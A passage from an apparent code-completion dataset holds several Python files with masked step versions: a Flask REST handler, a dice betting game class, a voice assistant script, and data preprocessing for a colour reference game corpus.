'resultStatus': 'SUCCESS',
'message': "Hello Api Handler"
}
def post(self):
print(self)
parser = reqparse.RequestParser()
parser.add_argument('type', type=str)
parser.add_argument('message', type=str)
args = parser.parse_args()
print(args)
# note, the post req from frontend needs to match the strings here (e.g. 'type and 'message')
request_type = args['type']
request_json = args['message']
# ret_status, ret_msg = ReturnData(request_type, request_json)
# currently just returning the req straight
ret_status = request_type
ret_msg = request_json
if ret_msg:
message = "Your Message Requested: {}".format(ret_msg)
else:
message = "No Msg"
final_ret = {"status": "Success", "message": message}
return final_ret
|
normal
|
{
"blob_id": "80c3d9165c1b592122fabf6382e265465604989c",
"index": 1450,
"step-1": "<mask token>\n\n\nclass HelloApiHandler(Resource):\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass HelloApiHandler(Resource):\n\n def get(self):\n return {'resultStatus': 'SUCCESS', 'message': 'Hello Api Handler'}\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass HelloApiHandler(Resource):\n\n def get(self):\n return {'resultStatus': 'SUCCESS', 'message': 'Hello Api Handler'}\n\n def post(self):\n print(self)\n parser = reqparse.RequestParser()\n parser.add_argument('type', type=str)\n parser.add_argument('message', type=str)\n args = parser.parse_args()\n print(args)\n request_type = args['type']\n request_json = args['message']\n ret_status = request_type\n ret_msg = request_json\n if ret_msg:\n message = 'Your Message Requested: {}'.format(ret_msg)\n else:\n message = 'No Msg'\n final_ret = {'status': 'Success', 'message': message}\n return final_ret\n",
"step-4": "from flask_restful import Api, Resource, reqparse\n\n\nclass HelloApiHandler(Resource):\n\n def get(self):\n return {'resultStatus': 'SUCCESS', 'message': 'Hello Api Handler'}\n\n def post(self):\n print(self)\n parser = reqparse.RequestParser()\n parser.add_argument('type', type=str)\n parser.add_argument('message', type=str)\n args = parser.parse_args()\n print(args)\n request_type = args['type']\n request_json = args['message']\n ret_status = request_type\n ret_msg = request_json\n if ret_msg:\n message = 'Your Message Requested: {}'.format(ret_msg)\n else:\n message = 'No Msg'\n final_ret = {'status': 'Success', 'message': message}\n return final_ret\n",
"step-5": "from flask_restful import Api, Resource, reqparse\n\nclass HelloApiHandler(Resource):\n def get(self):\n return {\n 'resultStatus': 'SUCCESS',\n 'message': \"Hello Api Handler\"\n }\n\n def post(self):\n print(self)\n parser = reqparse.RequestParser()\n parser.add_argument('type', type=str)\n parser.add_argument('message', type=str)\n\n args = parser.parse_args()\n\n print(args)\n # note, the post req from frontend needs to match the strings here (e.g. 'type and 'message')\n\n request_type = args['type']\n request_json = args['message']\n # ret_status, ret_msg = ReturnData(request_type, request_json)\n # currently just returning the req straight\n ret_status = request_type\n ret_msg = request_json\n\n if ret_msg:\n message = \"Your Message Requested: {}\".format(ret_msg)\n else:\n message = \"No Msg\"\n \n final_ret = {\"status\": \"Success\", \"message\": message}\n\n return final_ret",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
from game import BaseGame
class First(BaseGame):
key = 'F'
code = 'FIRST'
short_description = 'Vinci se esce 1 o 2. x2.8'
long_description = (
'Si lancia un unico dado, se esce 1 o 2 vinci 2.8 volte quello che hai'
' puntato.')
min_bet = 20
multiplier = 2.8
def has_won(self, draws):
return draws[0] in (1, 2)
|
normal
|
{
"blob_id": "81fa3129d971fe8296a89a7b772d61ff50a8b9f7",
"index": 9284,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass First(BaseGame):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def has_won(self, draws):\n return draws[0] in (1, 2)\n",
"step-3": "<mask token>\n\n\nclass First(BaseGame):\n key = 'F'\n code = 'FIRST'\n short_description = 'Vinci se esce 1 o 2. x2.8'\n long_description = (\n 'Si lancia un unico dado, se esce 1 o 2 vinci 2.8 volte quello che hai puntato.'\n )\n min_bet = 20\n multiplier = 2.8\n\n def has_won(self, draws):\n return draws[0] in (1, 2)\n",
"step-4": "from game import BaseGame\n\n\nclass First(BaseGame):\n key = 'F'\n code = 'FIRST'\n short_description = 'Vinci se esce 1 o 2. x2.8'\n long_description = (\n 'Si lancia un unico dado, se esce 1 o 2 vinci 2.8 volte quello che hai puntato.'\n )\n min_bet = 20\n multiplier = 2.8\n\n def has_won(self, draws):\n return draws[0] in (1, 2)\n",
"step-5": "from game import BaseGame\n\n\nclass First(BaseGame):\n key = 'F'\n code = 'FIRST'\n short_description = 'Vinci se esce 1 o 2. x2.8'\n long_description = (\n 'Si lancia un unico dado, se esce 1 o 2 vinci 2.8 volte quello che hai'\n ' puntato.')\n min_bet = 20\n multiplier = 2.8\n\n def has_won(self, draws):\n return draws[0] in (1, 2)\n",
"step-ids": [
0,
2,
3,
4,
5
]
}
|
[
0,
2,
3,
4,
5
] |
import speech_recognition as sr
import pyttsx3
import pywhatkit
import datetime
listner = sr.Recognizer()
engine = pyttsx3.init()
#change voices
voices = engine.getProperty('voices')
engine.setProperty('voice',voices[10].id)
rate = engine.getProperty('rate')
engine.setProperty('rate', 150)
#for machine to say
def talk(text):
engine.say(text)
engine.runAndWait()
def takeCommand():
try:
with sr.Microphone() as sc:
print("Listening......")
vc = listner.listen(sc)
cmd = listner.recognize_google(vc)
cmd = cmd.lower()
if 'alexa' in cmd:
cmd = cmd.replace('alexa','')
except:
pass
return cmd
def run_alexa():
command = takeCommand()
print(command)
if 'play' in command:
song = command.replace('play','')
talk('playing '+song)
pywhatkit.playonyt(song)
if 'time' in command:
time = datetime.datetime.now().strftime('%I:%M %p')
talk('time is '+time)
print(time)
run_alexa()
|
normal
|
{
"blob_id": "c4f437e6f5aaeccb6dd0948c3ed1f1d465bb29ce",
"index": 1200,
"step-1": "<mask token>\n\n\ndef talk(text):\n engine.say(text)\n engine.runAndWait()\n\n\ndef takeCommand():\n try:\n with sr.Microphone() as sc:\n print('Listening......')\n vc = listner.listen(sc)\n cmd = listner.recognize_google(vc)\n cmd = cmd.lower()\n if 'alexa' in cmd:\n cmd = cmd.replace('alexa', '')\n except:\n pass\n return cmd\n\n\ndef run_alexa():\n command = takeCommand()\n print(command)\n if 'play' in command:\n song = command.replace('play', '')\n talk('playing ' + song)\n pywhatkit.playonyt(song)\n if 'time' in command:\n time = datetime.datetime.now().strftime('%I:%M %p')\n talk('time is ' + time)\n print(time)\n\n\n<mask token>\n",
"step-2": "<mask token>\nengine.setProperty('voice', voices[10].id)\n<mask token>\nengine.setProperty('rate', 150)\n\n\ndef talk(text):\n engine.say(text)\n engine.runAndWait()\n\n\ndef takeCommand():\n try:\n with sr.Microphone() as sc:\n print('Listening......')\n vc = listner.listen(sc)\n cmd = listner.recognize_google(vc)\n cmd = cmd.lower()\n if 'alexa' in cmd:\n cmd = cmd.replace('alexa', '')\n except:\n pass\n return cmd\n\n\ndef run_alexa():\n command = takeCommand()\n print(command)\n if 'play' in command:\n song = command.replace('play', '')\n talk('playing ' + song)\n pywhatkit.playonyt(song)\n if 'time' in command:\n time = datetime.datetime.now().strftime('%I:%M %p')\n talk('time is ' + time)\n print(time)\n\n\nrun_alexa()\n",
"step-3": "<mask token>\nlistner = sr.Recognizer()\nengine = pyttsx3.init()\nvoices = engine.getProperty('voices')\nengine.setProperty('voice', voices[10].id)\nrate = engine.getProperty('rate')\nengine.setProperty('rate', 150)\n\n\ndef talk(text):\n engine.say(text)\n engine.runAndWait()\n\n\ndef takeCommand():\n try:\n with sr.Microphone() as sc:\n print('Listening......')\n vc = listner.listen(sc)\n cmd = listner.recognize_google(vc)\n cmd = cmd.lower()\n if 'alexa' in cmd:\n cmd = cmd.replace('alexa', '')\n except:\n pass\n return cmd\n\n\ndef run_alexa():\n command = takeCommand()\n print(command)\n if 'play' in command:\n song = command.replace('play', '')\n talk('playing ' + song)\n pywhatkit.playonyt(song)\n if 'time' in command:\n time = datetime.datetime.now().strftime('%I:%M %p')\n talk('time is ' + time)\n print(time)\n\n\nrun_alexa()\n",
"step-4": "import speech_recognition as sr\nimport pyttsx3\nimport pywhatkit\nimport datetime\nlistner = sr.Recognizer()\nengine = pyttsx3.init()\nvoices = engine.getProperty('voices')\nengine.setProperty('voice', voices[10].id)\nrate = engine.getProperty('rate')\nengine.setProperty('rate', 150)\n\n\ndef talk(text):\n engine.say(text)\n engine.runAndWait()\n\n\ndef takeCommand():\n try:\n with sr.Microphone() as sc:\n print('Listening......')\n vc = listner.listen(sc)\n cmd = listner.recognize_google(vc)\n cmd = cmd.lower()\n if 'alexa' in cmd:\n cmd = cmd.replace('alexa', '')\n except:\n pass\n return cmd\n\n\ndef run_alexa():\n command = takeCommand()\n print(command)\n if 'play' in command:\n song = command.replace('play', '')\n talk('playing ' + song)\n pywhatkit.playonyt(song)\n if 'time' in command:\n time = datetime.datetime.now().strftime('%I:%M %p')\n talk('time is ' + time)\n print(time)\n\n\nrun_alexa()\n",
"step-5": "import speech_recognition as sr\nimport pyttsx3\nimport pywhatkit\nimport datetime\n\n\nlistner = sr.Recognizer()\nengine = pyttsx3.init()\n\n#change voices\nvoices = engine.getProperty('voices')\nengine.setProperty('voice',voices[10].id)\nrate = engine.getProperty('rate')\nengine.setProperty('rate', 150)\n\n#for machine to say\ndef talk(text):\n engine.say(text)\n engine.runAndWait()\n\ndef takeCommand():\n try:\n with sr.Microphone() as sc:\n print(\"Listening......\")\n vc = listner.listen(sc)\n cmd = listner.recognize_google(vc)\n cmd = cmd.lower()\n if 'alexa' in cmd:\n cmd = cmd.replace('alexa','')\n except:\n pass\n return cmd\n\ndef run_alexa():\n command = takeCommand()\n print(command)\n if 'play' in command:\n song = command.replace('play','')\n talk('playing '+song)\n pywhatkit.playonyt(song)\n \n if 'time' in command:\n time = datetime.datetime.now().strftime('%I:%M %p')\n talk('time is '+time)\n print(time)\n\nrun_alexa()",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
from collections import Counter
import pandas as pd
import string
from collections import namedtuple, defaultdict
import csv
import sys
import torch
import numpy as np
from sklearn.preprocessing import LabelEncoder
from scipy.sparse import coo_matrix
from tqdm import tqdm
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
device = 'cpu'
def get_data():
df = pd.read_csv("./data/filteredCorpus.csv")
df_filt = df[df['outcome']==True] # use only successful games
df_filt = df_filt[df_filt['role']=='speaker'] # use speaker utterances
df_filt = df_filt[df_filt['source']=='human'] # use speaker utterances
# making a list of utterances that we want to use, so we can take these rows from df_filt
utt = df_filt['contents']
utt_filt = [u.lower() for u in utt if len(u.split()) == 1] # only use one word utterances
utt_filt = [u.translate(str.maketrans('', '', string.punctuation)) for u in utt_filt] # remove punctuation
utt_final = list((Counter(utt_filt) - Counter(set(utt_filt))).keys()) # use utterances that appear more than once
# df_filt = df_filt[df_filt['numCleanWords'] == 1]
df_filt['contents'] = df_filt['contents'].apply(lambda x: x.lower())
df_filt['contents'] = df_filt['contents'].apply(lambda x: x.translate(str.maketrans('', '', string.punctuation)))# filter to take out punctuation
df_final = df.loc[df['contents'].isin(utt_final)] # this is the dataset of all the games that we want to use
le = LabelEncoder()
df_final['contents'] = le.fit_transform(df_final['contents'])
return df_final, le
def get_meaning_matrix(df):
df['colors'] = list(zip(df['clickColH'], df['clickColS'], df['clickColL']))
df['colors'] = df['colors'].apply(lambda x: str(x))
colors_le = LabelEncoder()
df['colors'] = colors_le.fit_transform(df['colors']) # 100 x 100 (test data)
print("length colors and contents", len(df['colors']), len(df['contents']))
print("set colors and contents", len(set(df['colors'])), len(set(df['contents'])))
meaning_mat = pd.crosstab(df['colors'], df['contents']) # rows are colors, columns are utterances
# row numbers and column numbers correspond to labels from colors_le and le (utterances) from get_data()
meaning_mat = np.array(meaning_mat) # a num_color x num_utterances matrix
for i in range(len(meaning_mat[:,0])):
if sum(meaning_mat[i,:]) == 0:
print("meaning mat is 0 for this row: ", i)
for j in range(len(meaning_mat[0,:])):
if meaning_mat[i,j] == 0:
print("meaning mat is 0 at: ", i,j," !!!")
return meaning_mat, colors_le
# Literal listener data function
def get_pragmatic_listener_testing_data(df):
output = []
all_utt = list(set(list(df['contents'])))
desc_to_idx = {u: i for i,u in enumerate(all_utt)}
for _, row in tqdm(df.iterrows(), total=len(df)):
utt = torch.tensor(row['contents']).to(device)
correct = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']], dtype=torch.float32)
alt1 = torch.tensor(row[['alt1ColH', 'alt1ColS', 'alt1ColL']], dtype=torch.float32)
alt2 = torch.tensor(row[['alt2ColH', 'alt2ColS', 'alt2ColL']], dtype=torch.float32)
colors = (correct, alt1, alt2)
# idxs = random.choice([0,1,2]) # randomly permute colors
idxs = np.arange(3)
np.random.shuffle(idxs)
colors_shuff = torch.stack([colors[idxs[0]], colors[idxs[1]], colors[idxs[2]]]).to(device)
correct_idx = torch.tensor(idxs[0], dtype=torch.long).to(device) # index where correct color goes
output.append((correct_idx, colors_shuff, utt))
return output, all_utt, desc_to_idx # [correct_referent_idx, list_of_three_referents, descriptor_idx] desc_to_idx idx_to_desc
# return all_utt, idx_to_desc # [correct_referent_idx, list_of_three_referents, descriptor_idx] desc_to_idx idx_to_desc
def get_literal_listener_training_data(df):
output = []
all_utt = df['contents']
idx_to_desc = {i: u for i,u in enumerate(all_utt)}
for _, row in tqdm(df.iterrows(), total=len(df)):
utt = torch.tensor(row['contents']).to(device)
correct = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']], dtype=torch.float32)
alt1 = torch.tensor(row[['alt1ColH', 'alt1ColS', 'alt1ColL']], dtype=torch.float32)
alt2 = torch.tensor(row[['alt2ColH', 'alt2ColS', 'alt2ColL']], dtype=torch.float32)
colors = (correct, alt1, alt2)
# idxs = random.choice([0,1,2]) # randomly permute colors
idxs = np.arange(3)
np.random.shuffle(idxs)
colors_shuff = torch.stack([colors[idxs[0]], colors[idxs[1]], colors[idxs[2]]]).to(device)
correct_idx = torch.tensor(idxs[0], dtype=torch.long).to(device) # index where correct color goes
output.append((correct_idx, colors_shuff, utt))
return output#, all_utt, idx_to_desc # [correct_referent_idx, list_of_three_referents, descriptor_idx] desc_to_idx idx_to_desc
# Literal Speaker data function - hi r u ok
def get_literal_speaker_training_data(df):
output = []
for _, row in tqdm(df.iterrows(), total=len(df)):
utt = torch.tensor(row['contents'], dtype=torch.long).to(device)
color = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']], dtype=torch.float32).to(device)
output.append([color, utt])
return output # [referent, utterance_idx]
|
normal
|
{
"blob_id": "613b060ee50b49417342cfa70b36f77d112dcc58",
"index": 2951,
"step-1": "<mask token>\n\n\ndef get_data():\n df = pd.read_csv('./data/filteredCorpus.csv')\n df_filt = df[df['outcome'] == True]\n df_filt = df_filt[df_filt['role'] == 'speaker']\n df_filt = df_filt[df_filt['source'] == 'human']\n utt = df_filt['contents']\n utt_filt = [u.lower() for u in utt if len(u.split()) == 1]\n utt_filt = [u.translate(str.maketrans('', '', string.punctuation)) for\n u in utt_filt]\n utt_final = list((Counter(utt_filt) - Counter(set(utt_filt))).keys())\n df_filt['contents'] = df_filt['contents'].apply(lambda x: x.lower())\n df_filt['contents'] = df_filt['contents'].apply(lambda x: x.translate(\n str.maketrans('', '', string.punctuation)))\n df_final = df.loc[df['contents'].isin(utt_final)]\n le = LabelEncoder()\n df_final['contents'] = le.fit_transform(df_final['contents'])\n return df_final, le\n\n\ndef get_meaning_matrix(df):\n df['colors'] = list(zip(df['clickColH'], df['clickColS'], df['clickColL']))\n df['colors'] = df['colors'].apply(lambda x: str(x))\n colors_le = LabelEncoder()\n df['colors'] = colors_le.fit_transform(df['colors'])\n print('length colors and contents', len(df['colors']), len(df['contents']))\n print('set colors and contents', len(set(df['colors'])), len(set(df[\n 'contents'])))\n meaning_mat = pd.crosstab(df['colors'], df['contents'])\n meaning_mat = np.array(meaning_mat)\n for i in range(len(meaning_mat[:, 0])):\n if sum(meaning_mat[i, :]) == 0:\n print('meaning mat is 0 for this row: ', i)\n for j in range(len(meaning_mat[0, :])):\n if meaning_mat[i, j] == 0:\n print('meaning mat is 0 at: ', i, j, ' !!!')\n return meaning_mat, colors_le\n\n\n<mask token>\n\n\ndef get_literal_listener_training_data(df):\n output = []\n all_utt = df['contents']\n idx_to_desc = {i: u for i, u in enumerate(all_utt)}\n for _, row in tqdm(df.iterrows(), total=len(df)):\n utt = torch.tensor(row['contents']).to(device)\n correct = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']],\n dtype=torch.float32)\n alt1 = torch.tensor(row[['alt1ColH', 'alt1ColS', 'alt1ColL']],\n dtype=torch.float32)\n alt2 = torch.tensor(row[['alt2ColH', 'alt2ColS', 'alt2ColL']],\n dtype=torch.float32)\n colors = correct, alt1, alt2\n idxs = np.arange(3)\n np.random.shuffle(idxs)\n colors_shuff = torch.stack([colors[idxs[0]], colors[idxs[1]],\n colors[idxs[2]]]).to(device)\n correct_idx = torch.tensor(idxs[0], dtype=torch.long).to(device)\n output.append((correct_idx, colors_shuff, utt))\n return output\n\n\ndef get_literal_speaker_training_data(df):\n output = []\n for _, row in tqdm(df.iterrows(), total=len(df)):\n utt = torch.tensor(row['contents'], dtype=torch.long).to(device)\n color = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']],\n dtype=torch.float32).to(device)\n output.append([color, utt])\n return output\n",
"step-2": "<mask token>\n\n\ndef get_data():\n df = pd.read_csv('./data/filteredCorpus.csv')\n df_filt = df[df['outcome'] == True]\n df_filt = df_filt[df_filt['role'] == 'speaker']\n df_filt = df_filt[df_filt['source'] == 'human']\n utt = df_filt['contents']\n utt_filt = [u.lower() for u in utt if len(u.split()) == 1]\n utt_filt = [u.translate(str.maketrans('', '', string.punctuation)) for\n u in utt_filt]\n utt_final = list((Counter(utt_filt) - Counter(set(utt_filt))).keys())\n df_filt['contents'] = df_filt['contents'].apply(lambda x: x.lower())\n df_filt['contents'] = df_filt['contents'].apply(lambda x: x.translate(\n str.maketrans('', '', string.punctuation)))\n df_final = df.loc[df['contents'].isin(utt_final)]\n le = LabelEncoder()\n df_final['contents'] = le.fit_transform(df_final['contents'])\n return df_final, le\n\n\ndef get_meaning_matrix(df):\n df['colors'] = list(zip(df['clickColH'], df['clickColS'], df['clickColL']))\n df['colors'] = df['colors'].apply(lambda x: str(x))\n colors_le = LabelEncoder()\n df['colors'] = colors_le.fit_transform(df['colors'])\n print('length colors and contents', len(df['colors']), len(df['contents']))\n print('set colors and contents', len(set(df['colors'])), len(set(df[\n 'contents'])))\n meaning_mat = pd.crosstab(df['colors'], df['contents'])\n meaning_mat = np.array(meaning_mat)\n for i in range(len(meaning_mat[:, 0])):\n if sum(meaning_mat[i, :]) == 0:\n print('meaning mat is 0 for this row: ', i)\n for j in range(len(meaning_mat[0, :])):\n if meaning_mat[i, j] == 0:\n print('meaning mat is 0 at: ', i, j, ' !!!')\n return meaning_mat, colors_le\n\n\ndef get_pragmatic_listener_testing_data(df):\n output = []\n all_utt = list(set(list(df['contents'])))\n desc_to_idx = {u: i for i, u in enumerate(all_utt)}\n for _, row in tqdm(df.iterrows(), total=len(df)):\n utt = torch.tensor(row['contents']).to(device)\n correct = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']],\n dtype=torch.float32)\n alt1 = torch.tensor(row[['alt1ColH', 'alt1ColS', 'alt1ColL']],\n dtype=torch.float32)\n alt2 = torch.tensor(row[['alt2ColH', 'alt2ColS', 'alt2ColL']],\n dtype=torch.float32)\n colors = correct, alt1, alt2\n idxs = np.arange(3)\n np.random.shuffle(idxs)\n colors_shuff = torch.stack([colors[idxs[0]], colors[idxs[1]],\n colors[idxs[2]]]).to(device)\n correct_idx = torch.tensor(idxs[0], dtype=torch.long).to(device)\n output.append((correct_idx, colors_shuff, utt))\n return output, all_utt, desc_to_idx\n\n\ndef get_literal_listener_training_data(df):\n output = []\n all_utt = df['contents']\n idx_to_desc = {i: u for i, u in enumerate(all_utt)}\n for _, row in tqdm(df.iterrows(), total=len(df)):\n utt = torch.tensor(row['contents']).to(device)\n correct = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']],\n dtype=torch.float32)\n alt1 = torch.tensor(row[['alt1ColH', 'alt1ColS', 'alt1ColL']],\n dtype=torch.float32)\n alt2 = torch.tensor(row[['alt2ColH', 'alt2ColS', 'alt2ColL']],\n dtype=torch.float32)\n colors = correct, alt1, alt2\n idxs = np.arange(3)\n np.random.shuffle(idxs)\n colors_shuff = torch.stack([colors[idxs[0]], colors[idxs[1]],\n colors[idxs[2]]]).to(device)\n correct_idx = torch.tensor(idxs[0], dtype=torch.long).to(device)\n output.append((correct_idx, colors_shuff, utt))\n return output\n\n\ndef get_literal_speaker_training_data(df):\n output = []\n for _, row in tqdm(df.iterrows(), total=len(df)):\n utt = torch.tensor(row['contents'], dtype=torch.long).to(device)\n color = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']],\n dtype=torch.float32).to(device)\n output.append([color, utt])\n return output\n",
"step-3": "<mask token>\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\ndevice = 'cpu'\n\n\ndef get_data():\n df = pd.read_csv('./data/filteredCorpus.csv')\n df_filt = df[df['outcome'] == True]\n df_filt = df_filt[df_filt['role'] == 'speaker']\n df_filt = df_filt[df_filt['source'] == 'human']\n utt = df_filt['contents']\n utt_filt = [u.lower() for u in utt if len(u.split()) == 1]\n utt_filt = [u.translate(str.maketrans('', '', string.punctuation)) for\n u in utt_filt]\n utt_final = list((Counter(utt_filt) - Counter(set(utt_filt))).keys())\n df_filt['contents'] = df_filt['contents'].apply(lambda x: x.lower())\n df_filt['contents'] = df_filt['contents'].apply(lambda x: x.translate(\n str.maketrans('', '', string.punctuation)))\n df_final = df.loc[df['contents'].isin(utt_final)]\n le = LabelEncoder()\n df_final['contents'] = le.fit_transform(df_final['contents'])\n return df_final, le\n\n\ndef get_meaning_matrix(df):\n df['colors'] = list(zip(df['clickColH'], df['clickColS'], df['clickColL']))\n df['colors'] = df['colors'].apply(lambda x: str(x))\n colors_le = LabelEncoder()\n df['colors'] = colors_le.fit_transform(df['colors'])\n print('length colors and contents', len(df['colors']), len(df['contents']))\n print('set colors and contents', len(set(df['colors'])), len(set(df[\n 'contents'])))\n meaning_mat = pd.crosstab(df['colors'], df['contents'])\n meaning_mat = np.array(meaning_mat)\n for i in range(len(meaning_mat[:, 0])):\n if sum(meaning_mat[i, :]) == 0:\n print('meaning mat is 0 for this row: ', i)\n for j in range(len(meaning_mat[0, :])):\n if meaning_mat[i, j] == 0:\n print('meaning mat is 0 at: ', i, j, ' !!!')\n return meaning_mat, colors_le\n\n\ndef get_pragmatic_listener_testing_data(df):\n output = []\n all_utt = list(set(list(df['contents'])))\n desc_to_idx = {u: i for i, u in enumerate(all_utt)}\n for _, row in tqdm(df.iterrows(), total=len(df)):\n utt = torch.tensor(row['contents']).to(device)\n correct = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']],\n dtype=torch.float32)\n alt1 = torch.tensor(row[['alt1ColH', 'alt1ColS', 'alt1ColL']],\n dtype=torch.float32)\n alt2 = torch.tensor(row[['alt2ColH', 'alt2ColS', 'alt2ColL']],\n dtype=torch.float32)\n colors = correct, alt1, alt2\n idxs = np.arange(3)\n np.random.shuffle(idxs)\n colors_shuff = torch.stack([colors[idxs[0]], colors[idxs[1]],\n colors[idxs[2]]]).to(device)\n correct_idx = torch.tensor(idxs[0], dtype=torch.long).to(device)\n output.append((correct_idx, colors_shuff, utt))\n return output, all_utt, desc_to_idx\n\n\ndef get_literal_listener_training_data(df):\n output = []\n all_utt = df['contents']\n idx_to_desc = {i: u for i, u in enumerate(all_utt)}\n for _, row in tqdm(df.iterrows(), total=len(df)):\n utt = torch.tensor(row['contents']).to(device)\n correct = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']],\n dtype=torch.float32)\n alt1 = torch.tensor(row[['alt1ColH', 'alt1ColS', 'alt1ColL']],\n dtype=torch.float32)\n alt2 = torch.tensor(row[['alt2ColH', 'alt2ColS', 'alt2ColL']],\n dtype=torch.float32)\n colors = correct, alt1, alt2\n idxs = np.arange(3)\n np.random.shuffle(idxs)\n colors_shuff = torch.stack([colors[idxs[0]], colors[idxs[1]],\n colors[idxs[2]]]).to(device)\n correct_idx = torch.tensor(idxs[0], dtype=torch.long).to(device)\n output.append((correct_idx, colors_shuff, utt))\n return output\n\n\ndef get_literal_speaker_training_data(df):\n output = []\n for _, row in tqdm(df.iterrows(), total=len(df)):\n utt = torch.tensor(row['contents'], dtype=torch.long).to(device)\n color = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']],\n dtype=torch.float32).to(device)\n output.append([color, utt])\n return output\n",
"step-4": "from collections import Counter\nimport pandas as pd\nimport string\nfrom collections import namedtuple, defaultdict\nimport csv\nimport sys\nimport torch\nimport numpy as np\nfrom sklearn.preprocessing import LabelEncoder\nfrom scipy.sparse import coo_matrix\nfrom tqdm import tqdm\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\ndevice = 'cpu'\n\n\ndef get_data():\n df = pd.read_csv('./data/filteredCorpus.csv')\n df_filt = df[df['outcome'] == True]\n df_filt = df_filt[df_filt['role'] == 'speaker']\n df_filt = df_filt[df_filt['source'] == 'human']\n utt = df_filt['contents']\n utt_filt = [u.lower() for u in utt if len(u.split()) == 1]\n utt_filt = [u.translate(str.maketrans('', '', string.punctuation)) for\n u in utt_filt]\n utt_final = list((Counter(utt_filt) - Counter(set(utt_filt))).keys())\n df_filt['contents'] = df_filt['contents'].apply(lambda x: x.lower())\n df_filt['contents'] = df_filt['contents'].apply(lambda x: x.translate(\n str.maketrans('', '', string.punctuation)))\n df_final = df.loc[df['contents'].isin(utt_final)]\n le = LabelEncoder()\n df_final['contents'] = le.fit_transform(df_final['contents'])\n return df_final, le\n\n\ndef get_meaning_matrix(df):\n df['colors'] = list(zip(df['clickColH'], df['clickColS'], df['clickColL']))\n df['colors'] = df['colors'].apply(lambda x: str(x))\n colors_le = LabelEncoder()\n df['colors'] = colors_le.fit_transform(df['colors'])\n print('length colors and contents', len(df['colors']), len(df['contents']))\n print('set colors and contents', len(set(df['colors'])), len(set(df[\n 'contents'])))\n meaning_mat = pd.crosstab(df['colors'], df['contents'])\n meaning_mat = np.array(meaning_mat)\n for i in range(len(meaning_mat[:, 0])):\n if sum(meaning_mat[i, :]) == 0:\n print('meaning mat is 0 for this row: ', i)\n for j in range(len(meaning_mat[0, :])):\n if meaning_mat[i, j] == 0:\n print('meaning mat is 0 at: ', i, j, ' !!!')\n return meaning_mat, colors_le\n\n\ndef get_pragmatic_listener_testing_data(df):\n output = []\n all_utt = list(set(list(df['contents'])))\n desc_to_idx = {u: i for i, u in enumerate(all_utt)}\n for _, row in tqdm(df.iterrows(), total=len(df)):\n utt = torch.tensor(row['contents']).to(device)\n correct = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']],\n dtype=torch.float32)\n alt1 = torch.tensor(row[['alt1ColH', 'alt1ColS', 'alt1ColL']],\n dtype=torch.float32)\n alt2 = torch.tensor(row[['alt2ColH', 'alt2ColS', 'alt2ColL']],\n dtype=torch.float32)\n colors = correct, alt1, alt2\n idxs = np.arange(3)\n np.random.shuffle(idxs)\n colors_shuff = torch.stack([colors[idxs[0]], colors[idxs[1]],\n colors[idxs[2]]]).to(device)\n correct_idx = torch.tensor(idxs[0], dtype=torch.long).to(device)\n output.append((correct_idx, colors_shuff, utt))\n return output, all_utt, desc_to_idx\n\n\ndef get_literal_listener_training_data(df):\n output = []\n all_utt = df['contents']\n idx_to_desc = {i: u for i, u in enumerate(all_utt)}\n for _, row in tqdm(df.iterrows(), total=len(df)):\n utt = torch.tensor(row['contents']).to(device)\n correct = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']],\n dtype=torch.float32)\n alt1 = torch.tensor(row[['alt1ColH', 'alt1ColS', 'alt1ColL']],\n dtype=torch.float32)\n alt2 = torch.tensor(row[['alt2ColH', 'alt2ColS', 'alt2ColL']],\n dtype=torch.float32)\n colors = correct, alt1, alt2\n idxs = np.arange(3)\n np.random.shuffle(idxs)\n colors_shuff = torch.stack([colors[idxs[0]], colors[idxs[1]],\n colors[idxs[2]]]).to(device)\n correct_idx = torch.tensor(idxs[0], dtype=torch.long).to(device)\n output.append((correct_idx, colors_shuff, utt))\n return output\n\n\ndef get_literal_speaker_training_data(df):\n output = []\n for _, row in tqdm(df.iterrows(), total=len(df)):\n utt = torch.tensor(row['contents'], dtype=torch.long).to(device)\n color = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']],\n dtype=torch.float32).to(device)\n output.append([color, utt])\n return output\n",
"step-5": "from collections import Counter\nimport pandas as pd\nimport string\nfrom collections import namedtuple, defaultdict\nimport csv\nimport sys\nimport torch\nimport numpy as np\nfrom sklearn.preprocessing import LabelEncoder\nfrom scipy.sparse import coo_matrix\nfrom tqdm import tqdm\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\ndevice = 'cpu'\n\ndef get_data():\n df = pd.read_csv(\"./data/filteredCorpus.csv\")\n df_filt = df[df['outcome']==True] # use only successful games\n df_filt = df_filt[df_filt['role']=='speaker'] # use speaker utterances\n df_filt = df_filt[df_filt['source']=='human'] # use speaker utterances\n\n # making a list of utterances that we want to use, so we can take these rows from df_filt\n utt = df_filt['contents']\n utt_filt = [u.lower() for u in utt if len(u.split()) == 1] # only use one word utterances\n utt_filt = [u.translate(str.maketrans('', '', string.punctuation)) for u in utt_filt] # remove punctuation\n utt_final = list((Counter(utt_filt) - Counter(set(utt_filt))).keys()) # use utterances that appear more than once\n\n # df_filt = df_filt[df_filt['numCleanWords'] == 1]\n df_filt['contents'] = df_filt['contents'].apply(lambda x: x.lower())\n df_filt['contents'] = df_filt['contents'].apply(lambda x: x.translate(str.maketrans('', '', 